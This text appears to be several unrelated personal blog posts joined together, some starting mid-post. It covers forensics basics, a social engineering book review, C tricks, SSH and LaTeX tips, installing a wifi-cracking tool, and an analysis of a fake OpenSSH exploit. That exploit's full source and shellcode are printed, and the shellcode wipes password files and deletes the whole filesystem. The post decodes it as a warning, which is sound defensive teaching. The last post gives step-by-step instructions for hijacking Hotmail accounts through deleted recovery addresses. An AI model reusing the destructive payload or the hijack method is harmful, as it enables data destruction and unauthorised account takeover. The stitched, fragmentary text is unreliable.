ldd
-bash: ldd: command not found

However, there is a “similar” command called otool  on OS X that you can use :

otool -L myExecutable

For the one who never used it,  the ldd  command is used to show the dynamic libraries a executable is linked to, or what libraries the executable needs to run.  If the otool command is not recognized on your mac, you probably need to install xcode. You can find the documentation about otool here.

To make it easier, I will set a few questions and I will try to develop the answer, then I will go on with an example of forensic examination, and finally I will develop a small Android Forensic Application. The project will be stored on GitHub (here) and finally the entire tutorial will be available on SecITs (here).

• What is a computer crime, and is forensic examination always related to computer crimes ?
• What are forensic examiners doing ?
• How to become a forensic examiner ?
• How strict should a forensic examiner be ?
• Forensic examiners VS the law ?
• Differences between forensic examination on computers and mobile devices ?

What are forensic examiners doing ?

There is a hierarchy of forensic examiners, I will divide them in multiple categories :

1. First Respond Patrols
2. Investigators
3. Specialists
4. High Tech Examiners
5. Researchers

How to become a forensic examiner ?
Becoming a forensic examiner depends on what you want to do, as explained before there are different level of forensic examiners the first way I would advertise is to go to universities such as the University of Abertay Dundee and follow courses such as this or this as an undergrad, or this, this and this as a postgraduate. However, it is also possible to become a forensic examiner by following a Computer Science cursus and having forensic examinations as hobby. There are multiple communities of ethical hackers and white hat on the web which are advertising for challenges. Doing a PhD might also help you to reach the top of the pyramid and become a digital forensic researcher in a University.

How strict should a forensic examiner be ?  

A forensic examination is a very strict job, all the action performed during the investigation should be recorded on a notebook, each of the action should also be performed on a duplicated image of the original support.

The investigation performed by the forensic examiner will determine if the suspect is guilty or not, at the end of the investigation the forensic examiner will have to hand a partial report back to the court including all the findings, actions, notes. Each of the actions performed during the investigation should be able to be reproduced by another forensic examiner during another forensic examination.

The job of a forensic examiner is very stressful,for example, data should never be altered,data should not be compromised, the written report should be partial, and should not include feelings. The forensic examiner should always stay aware that he is cannot judge, and that its report will help the court to take the right decision in favor or in disfavor of a suspect.

The forensic examiner might also be obliged to testify in a court, on his actions on the device, or on the case. This may add pressure on the shoulders of a forensic examiner.

Key words : Partial, Strict, Organized, Structure, Reports.

Forensic examiners VS the law ? 

As said in the previous question, each action performed on a device will have consequences, and the law is strict. Forensic examiners cannot make errors, they have to write a detailed report about their findings, the data gathered, the pictures encountered and the commands they were running on the image or on the hard drive / mobile device / usb key etc they received. Forensic examiners will always be the one responsible if something goes wrong during an investigation and forensic examiners might have to testify in front of a court, they  might also have to face the suspect. A forensic examiner has a lot of responsibilities, being partial organized and strict as explained before.

A forensic examiner has to follow standards during an investigation, such as the ACPO guide lines. These standards will be described in the second part of this tutorial.

Differences between forensic examination on computers and mobile devices ?

Forensic examination is a tricky field.

i.e. computers can be accessed at any time, they can also be dissembled, hard drives can be taken away and investigated in another place, while mobile devices are running on battery, do not possesses hard drives, but flash drives and do not follow the same architecture. Below some problems occurring with mobile devices :

Mobile devices can run closed operating systems such as iOS, or Android, some “parts” might not be accessible,  be encrypted, be protected via a code or a pattern, can run out of battery, and data might not be accessed easily.

Some proprietary / open source softwares exist,and are updated following the multiple devices on the market, but as we know, mobile devices are following an exponential growth at the moment, and it can make the life of a forensic examiner a nightmare. In the last tutorial we will explore a way of doing a “small forensic examination” on an Android Device, and develop a small forensic framework in Java. This application will try to overcome the problems described above and will help forensic examiners to retrieve data from smartphones.

This was the first part of  ”Digital Forensic Examination 101″, in part2 we will see how to conduct a forensic examination on a fake computer case.

Note: These series of articles / tutorials are meant to be as exhaustive as possible, I would therefore appreciate your comments and I will edit / correct / update  the articles accordingly. If you have any questions feel free to ask in the comments, or contact me via the contact form [here] 

Social Engineering: The Art of Human Hacking

reading.

My first reading was fast, I wanted to know what techniques Christopher Hadnagy (the author) was using. After the first chapter I thought, “This guys knows what he is talking about”.  Chapters by chapters the author described techniques that he used to fool people, ways to ask questions, situations, etc.

The first chapters are  introductory chapters to social engineering techniques, information gathering, etc , however after the two first introductory chapters, the author introduces the reader to elicitation techniques, pretexting techniques, scenarios, which in my opinion where very well defined and covered.

The book then covers, faces expression, sometimes a bit to fast in my opinion, then goes on with Neuro-Linguistic Programming (NLP). NLP was probably the most confusing part for me, however Christopher covered it very well, he introduces the psychological part of Social Engineering, and thinking models. The book also details the power of persuasion as well as  how social engineers should listen to their targets.

In one of the chapters Christopher also covers social engineering tools and software that can be used against targets, in my opinion this chapters wasn’t necessary to the book. I had already used all the tools Christopher mentioned, and I would have definitely preferred one more chapter about persuasion, or “how to question a suspects”.

The end of the books covers the prevention, and how companies could prevent a social engineer to gather data. This chapter covers six steps that should be taught to employees.

After this first reading I was already convinced that the book would be useful, and I began to practice the author’s techniques on random people to improve my skills, I tried to pay attention to micro expressions while walking in the streets or while talking to people, I also tried some of the techniques on my friends, I tried to convince people etc. and it worked pretty well, and that’s how I decided to read the book once again, while keeping in mind that the book had been written by a social engineer.

During my second reading, I noticed that Christopher uses repetitions a lot in the book, a technique that Apple uses to convince people as well (did he wanted to convince us that the its book was awesome ?), another small annoying problem are the non shortened links present in the book when the author refers to its website or to youtube.

My second reading helped me to understand Neuro-Linguistic Programming (NLP) a bit more, and I had now time to read a bit more about NLP beside the book, I could also apply some more techniques, and then refer back to the book to compare my results and improve my trials.

I would say that the second reading was worth it, it helped me to improve the techniques I wasn’t “mastering” as well has having a better understanding of some chapters covered in the book.

To conclude, I would say that I read a few books on how to convince people, and on social engineering but this book is in my opinion the one which covers the best the psychological part of social engineering. I can also say that the examples given in the book did always make sense (which was not the case in all the books I read before). The author also pointed out very well the fact that to be “secure” you should be able to understand the techniques used by social engineers. This book might also help readers to have a better understanding of the people surrounding them, such as friends, family, and even children, since the book clearly points out the importance of “listening”.  Finally I sincerely recommend this book, to penetration testers, social engineers, psychology students and finally to everybody interested in security.

 
The first tricks I have been using sometimes is the following :

int i = "ABCD";

This stores the hexadecimal values of ABCD into I which should set the values to 0×41424344 (A = 41, B = 42, C = 43, D=44). I used this trick a couple of times for debugging purposes since it is easier to find ABCD or 0×41424344 than another value.

2)  The next C trick I have is the following :

int a = 1;
int b = 2;

a ^=b;
b ^=a;
a ^=b;

In this short example, the xor function is used

XOR

0 | 0 = 0

0 | 1 = 1

1 | 0 = 1

1 | 1 =0

Applied to our values it gives us the following :

a = 00000001 or 1
b = 00000010 or 2

a ^=b;
00000001
00000010
--------
00000011 = a or 3

b ^=a;
00000010
00000011
--------
00000001 = b or 1

Finally

a ^=b;
00000011
00000001
--------
00000010 = a or 2

As shown we inverted the values of ‘a’ and ‘b’ without using a third variable.

3) The third trick is about structures :

#include 

typedef struct myStruct{
        int x;
        int y;
        int z;
}myStruct;

myStruct ms={.x =1, .y=2, .z=3};

int main(void){

printf("test: %d",ms.x);
return 1;
}

As shown, the variables of the structure have been initialized at compile time and not first at 0. You can also use

struct myStruct myStruct = {1};

which will initialize all the elements to 1;

That’s all I got/remember at the moment, if I come across some other cool tricks (that I used) I’ll just update the post.

After a few searches on the Internet I found a pastebin page to illustrate my example.

The following page (here) claims that there is a 0 day exploit for openSSH 5.7 0day exploit. The page do not give any instructions, and displays a basic C code to compile with GCC on a linux machine. Below you can see the code :

/*
openSSH 5.7 0day exploit
Off by One error in auth2-pubkey.c
Author: Chroniccommand
Usage: ./exploit
greetz to _st4ck3d*, x3n0n, xin etc you know who you are 
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include 

void usage(char *argv[])
{
  printf("Usage: %s  \n", argv[0]);
  exit(1);
}

unsigned char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
"\xcd\x80";

int main(int argc, char *argv[])
{
  int uid = getuid();
  int port = 22, sock;
  struct hostent *host;
  struct sockaddr_in addr;

  if(uid !=0)
  {
    fprintf(stderr, "[!!]Error: You must be root\n");
    exit(1);
  }
  if(uid == 0)
  {
    printf("\t[+]Starting exploit..\n");
  }
  if(argc != 3)
       usage(argv);

  fprintf(stderr, "[!!]Exploit failed\n");
  (*(void(*)())shellcode)();
  exit(1);
  char payload[1024];
  memcpy(payload, &shellcode, sizeof(shellcode));
  if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  {
    printf("[+]Got shell\n");
    system("/bin/sh");
  }
  else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  {
    fprintf(stderr, "[!!]Exploit failed\n");
    exit(1);
  }
}

The exploit seems to be fine, and I guess a lot of people tried that exploit on their own machine, without looking inside the exploit.  Before executing that exploit, this is what they should have done, and this is actually what you should always do !

• Analyse it without executing it

Below you may see how to reverse an exploit with Perl or  Python :

$perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74
\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' > exploit

$strings exploit

or in Python

$python -c 'print "x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68x00x68x2fx62x69x6ex89xe3x52xe8x39x00x00x00x65x63x68x6fx20x22x22x20x3ex20
x2fx65x74x63x2fx73x68x61x64x6fx77x20x3bx20x65x63x68x6fx20x22x22x20x3ex20x2fx65x74x63x2fx70x61x73x73x77x64x20x3bx20x72x6dx20x2dx52x66x20x2fx00x57x53x89xe1xcdx80"' > exploit

$strings exploit

And this is the result that you should obtain:

Rfh-c
h/sh
h/bin
echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /

As shown in the previous table the code tries to execute the a “rm -Rf” on our hard drive and delete everything !

That’s why it is important to always reverse the shellcodes you are using before hand !

noktec:release Noktec$ ssh xavier@192.168.0.2
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
********************************
Please contact your system administrator.
Add correct host key in /Users/Noktec/.ssh/known_hosts to get rid of this message.
Offending key in /Users/Noktec/.ssh/known_hosts:12
RSA host key for 192.168.0.2 has changed and you have requested strict checking.
Host key verification failed.

I usually find this message quiet annoying, but knows the commands to avoid this problem, but today while speaking with a friend, he told me that he was usually deleting the SSH keys by hand in its “known_hosts” file. As there are some appropriate commands to do this I thought it would be a good idea to post them on my blog, and here they are :

ssh-keygen -R machine-name
ssh-keygen -R 192.168.0.2
ssh-keygen -R MyMachine.com

And that’s it, you will now be able to delete the ssh key without having to modify your “known_hosts” file by hand.

Note: This small tutorial is based on the repositories from backtrack 5 R1 and ubuntu 11.10

The first step is to add those lines to “etc/apt/sources.list”

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing



deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing



deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Once those lines added to the sources.list files you can run the command

$ sudo apt-get update 

And finally to install gerix you can finally run this last command :

$ sudo apt-get install gerix-wifi-cracker-ng 

And that’s it.

Those “types” of memory combined together are the full size of your ram, in my case 8Gb. Each type as a specific function in OS X those are described below :

Free:

This is RAM that’s not being used.

Inactive:

This information in memory is not actively being used, but was recently used.

For example, if you’ve been using Mail and then quit it, the RAM that Mail was using is marked as Inactive memory. This Inactive memory is available for use by another application, just like Free memory.  However, if you open Mail before its Inactive memory is used by a different application, Mail will open quicker because its Inactive memory is converted to Active memory, instead of loading Mail from the slower hard disk

Wired:

Information in this memory can’t be moved to the hard disk, so it must stay in RAM. The amount of Wired memory depends on the applications you are using.

Active:

This information is currently in memory, and has been recently used.

As you can see, the inactive memory is used for fast access to an application, and sometimes if happened that the memory is not released by OSX or not shared.  This can make the mac really slow and buggy. As I got the problem I searched for a solution I found that one :

• If you do not have the developers tools installed, install them.
• open a shell and type in the following command :

$/usr/bin/purge

The first step is to include the package :

\usepackage[nonumberlist]{glossaries}

\usepackage{acronym}

\makeglossaries

\newacronym{gui}{GUI}{Graphical User Interface}

\newacronym{sdk}{SDK}{Software Development Kit}

\glsaddall

\printglossaries

The first command list all the entries in the glossary, while the second prints the glossary out. In your text you may now use it such as following :

This is the \gls{gui} of my application. This \gls{gui} will display all the information[...].

and this should appear :

This is the Graphical User Interface (GUI). This GUI will display all the information[...].

Compile your LaTeX document a first time and then open a shell an type the following command:

makeindex Master_Thesis.glo -s Master_Thesis.ist -t Master_Thesis.glg -o Master_Thesis.gls

Compile your document with LaTeX a second time, and your glossary should appear right there.

and that’s it !

Below is a basic example of a LaTeX file with glossary :

\documentclass[12pt,a4paper]{report}
\usepackage[nonumberlist]{glossaries}
\usepackage{acronym}

\begin{document}

\title{}
\date{}
\maketitle

%Glossary
\makeglossaries

\newacronym{pdf}{PDF}{Portable Document Format }

%Abstract

\begin{abstract}

\end{abstract}
%Acknowledgments
\chapter*{Acknowledgements}

\tableofcontents
\listoffigures
\listoftables
\glsaddall
\printglossaries
\end{document}

Have Fun with LaTeX.

Long story short :

To make it work, the hacker needs to know the “save” e-mail address, and hope, this address has been deleted.

When you forgot your password it is possible to ask hotmail to “Email me a reset link“, when clicking on this link hotmail  shows the user the e-mail address to which it is going to send the reset link, for example :

my*****@hotmail.com

But in a few cases, this e-mail address might have been already deleted by hotmail (if you didn’t used it anymore, or if the target didn’t used it anymore), to verify that fact, the hacker can simply  return to the following link:

“Can’t access your account” (on the sign-in page)

From there the hacker can tick the  “I forgot my password” radio button,  following the link the hacker will find the page displayed below :
And here comes the trick :

IF the address does not exist anymore, the hacker will receive the following message :

If hotmail returns the following message the trick is to “recreate” this e-mail such as creating a new account, and then restore the password from the account you wanted to get the password back at first.

And that’s it, hotmail will not verify that the previous e-mail had been deleted or not, it will simply send you the restore password link.

Have fun.